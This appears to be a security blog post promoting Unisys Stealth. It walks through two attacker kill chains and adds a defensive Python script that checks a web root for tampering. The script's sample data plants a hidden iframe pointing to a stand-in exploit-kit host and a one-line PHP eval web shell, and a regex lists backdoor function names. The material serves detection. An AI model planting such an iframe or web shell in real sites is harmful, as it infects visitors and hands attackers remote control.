A few weeks ago I shared with you the joys of Unisys Stealth, a product that was developed for military cloaking of IT and has since been reworked for commercial use. Now you might be wondering why I'm talking about Stealth when the title of this blog is 'It's a Hacker's Life!'. The hacker cannot hack what he cannot see, so let's briefly go inside the mind of the hacker and see where he would go if he could see your network.
I recently sat through a presentation by Ilia Kolochenko, CEO of High-Tech Bridge SA, and I thoroughly enjoyed his explanation of what a hacker does when targeting an enterprise or SME environment. The following is an overview of my favourite parts of his presentation.
To begin, let's look at some statistics. Frighteningly, we are highly vulnerable purely because we pay too little focussed attention to our applications.
“27% of all security breaches at banks in 2014 involved web app attacks” | Verizon
“70% of vulnerabilities exist at the application layer, not network” | Gartner
“4/5 intrusions involved insecure web apps” | Frost & Sullivan and High-Tech Bridge
“74% of respondents consider public-facing web applications as the major threat” | SANS
“30 000 websites are hacked every day to distribute malware” | Sophos Labs
“86% of all websites have at least one serious vulnerability” | WhiteHat Security
“96% of tested applications have vulnerabilities” | Cenzic
Let's take a walkthrough of a hacker's logical steps when trying to gain access to your data.
Let's assume that a hacker is trying to gain access to your network; we can follow the steps they are likely to take. In this first scenario the starting point is a website that holds no sensitive data at all.
Step 1 – To begin, they compromise your website, even if it doesn't hold any confidential data.
Step 2 – They then place an exploit pack (malware) on one of your website's pages, keeping the same design and style in place so that you don't notice the alteration.
Step 3 – The aim now is to make contact with the victim (your employees, your big clients or partners), usually by email.
Step 4 – Once contact is established, they send a link to your website by social network or email.
Step 5 – Snap! The victim clicks, and a vulnerability in the victim's browser or one of its components (a plug-in, for example) is exploited.
Step 6 – The victim's device is now compromised and a backdoor is installed to control it remotely.
Step 7 – From here the attackers can move into your own network or that of your VIP client and do all kinds of damage.
Step 8 – In the final stages the attackers carefully patch your website, to stop other attackers getting in by the same route.
Step 9 – Then the real kick in the teeth: the attackers re-sell access to your website on the Dark Web.
Amazing, hey? And this is at the lower end of sensitivity, so imagine the chain of events at the higher end, say a bank or equivalent. Let's see how a hacker may gain entry there.
Step 1 – Quickly fingerprint the IDS/IPS/WAF (if any) to work out how to bypass them silently.
Step 2 – Compromise one of the web applications, or one of its components.
Step 3 – Patch the exploited vulnerability to prevent competing hackers from getting in.
Step 4 – Download all the valuable data from your databases.
Step 5 – Download your backups and the source code of your web applications.
Step 6 – Backdoor your web application to get instant and invisible access to it.
Step 7 – Try to re-use your IT team's passwords to compromise other internal systems.
Step 8 – Try to re-use your customers' passwords to compromise their email, PayPal accounts, etc.
Step 9 – Sell your data on the Dark Web and/or blackmail you with demands for ransom.
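Both chains hinge on a change to your website that looks identical to visitors (the exploit pack dropped into a page in step 2 of the first chain, the backdoor planted in step 6 of the second), so a visual check will never catch it. As an added example (my own illustration, not code from the post, from High-Tech Bridge or from Unisys), here is a small Python integrity check that compares the web root against a baseline of file hashes and then scans anything new or changed for hidden or off-site script/iframe tags and for functions typical of PHP backdoors. The sample site, the hostnames (acme.example, exploit-kit.example) and the file layout are all constructed for the example.

```python
import hashlib
import os
import re
from urllib.parse import urlparse

# Constructed sample web root (not data from the post). BASELINE is the state recorded
# at the last known-good deployment; CURRENT is the same site after the intrusion.
BASELINE = {
    "index.html": (b"<html><head><title>Acme</title></head><body><h1>Welcome</h1>"
                   b"<script src=\"/js/app.js\"></script></body></html>"),
    "about.html": b"<html><body><p>About us</p></body></html>",
    "js/app.js": b"console.log('app');",
}
CURRENT = dict(BASELINE)
# First chain, step 2: same page, same design, plus one invisible iframe to the exploit pack.
CURRENT["index.html"] = BASELINE["index.html"].replace(
    b"</body>",
    b"<iframe src=\"http://exploit-kit.example/ek.php\" width=\"1\" height=\"1\" "
    b"style=\"display:none\"></iframe></body>")
# Second chain, step 6: a new file that looks like a cache helper but is a backdoor.
CURRENT["images/cache.php"] = b"<?php @eval(base64_decode($_POST['c'])); ?>"

# Hosts the site legitimately loads scripts and frames from ("" covers relative URLs).
TRUSTED_HOSTS = {"", "www.acme.example", "cdn.acme.example"}

TAG_RE = re.compile(rb"<(script|iframe)\b([^>]*)>", re.I)
SRC_RE = re.compile(rb"""src\s*=\s*["']([^"']+)["']""", re.I)
HIDDEN_RE = re.compile(
    rb"""display\s*:\s*none|visibility\s*:\s*hidden|(width|height)\s*=\s*["']?[01](?!\d)""", re.I)
# Functions commonly seen in PHP backdoors; a hit in a new or changed file is worth a look.
SHELL_RE = re.compile(rb"\b(eval|assert|base64_decode|system|passthru|shell_exec)\s*\(", re.I)


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def snapshot_dir(root):
    """Read a real web root into {relative_path: bytes}. Run it once at deployment to
    record the baseline and again on a schedule; the sample above skips the disk."""
    snap = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                snap[rel] = fh.read()
    return snap


def hash_snapshot(snapshot):
    return {path: sha256(data) for path, data in snapshot.items()}


def diff_hashes(baseline, current):
    """Compare two {path: sha256} maps; returns (added, modified, removed) path lists."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified, removed


def injected_tags(html, trusted_hosts):
    """Flag <script>/<iframe> tags that load from an untrusted host or are hidden."""
    findings = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).decode().lower(), m.group(2)
        src = SRC_RE.search(attrs)
        host = (urlparse(src.group(1).decode()).hostname or "") if src else ""
        reasons = []
        if host not in trusted_hosts:
            reasons.append("untrusted host " + host)
        if tag == "iframe" and HIDDEN_RE.search(attrs):
            reasons.append("hidden iframe")
        if reasons:
            findings.append((tag, host, ", ".join(reasons)))
    return findings


def audit(baseline_snapshot, current_snapshot, trusted_hosts):
    """Integrity diff plus a content scan of anything new or changed; returns (path, finding) pairs."""
    added, modified, removed = diff_hashes(hash_snapshot(baseline_snapshot),
                                           hash_snapshot(current_snapshot))
    findings = [(p, "removed since baseline") for p in removed]
    for path in added + modified:
        data = current_snapshot[path]
        findings.append((path, "new file" if path in added else "modified"))
        lower = path.lower()
        if lower.endswith((".html", ".htm", ".php")):
            for tag, host, why in injected_tags(data, trusted_hosts):
                findings.append((path, "%s tag: %s" % (tag, why)))
        if lower.endswith(".php"):
            names = sorted({m.group(1).lower().decode() for m in SHELL_RE.finditer(data)})
            if names:
                findings.append((path, "webshell indicators: " + ", ".join(names)))
    return findings


if __name__ == "__main__":
    for path, finding in audit(BASELINE, CURRENT, TRUSTED_HOSTS):
        print("%-18s %s" % (path, finding))
```

Record the baseline with snapshot_dir() straight after a known-good deployment and keep it somewhere the web server cannot write to, because step 6 of the second chain shows the attacker will have write access to the web root and, as step 3 shows, will tidy up after themselves. The scan is a cheap first filter rather than a substitute for a proper file integrity monitor: it will not flag an inline script, and a backdoor that avoids the listed function names will only show up as "new file" or "modified", which is still the signal that matters.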
Now you have a firmer idea of a hacker's process when accessing your network; forewarned is forearmed, as they say.
Many companies turn away from investing in tight security principles and don't see the inevitable coming. We need to stop knee-jerking after the fact and start being proactive about cyber security! With cybercrime becoming more lucrative than the drugs trade, the more visible you are, the more risk you expose yourself to.
Hackers can't hack what they can't see, and luckily with Unisys Stealth we really do solve this problem. Cloaking your network with Stealth reduces your attack surface and micro-segments your network into encrypted communities of interest, giving you the best possible protection from hackers and allowing you to maintain a more predictable, safe network! Your public-facing web applications still have to be reachable, of course, so the steps above are also an argument for keeping them patched and monitored alongside cloaking the rest of the network.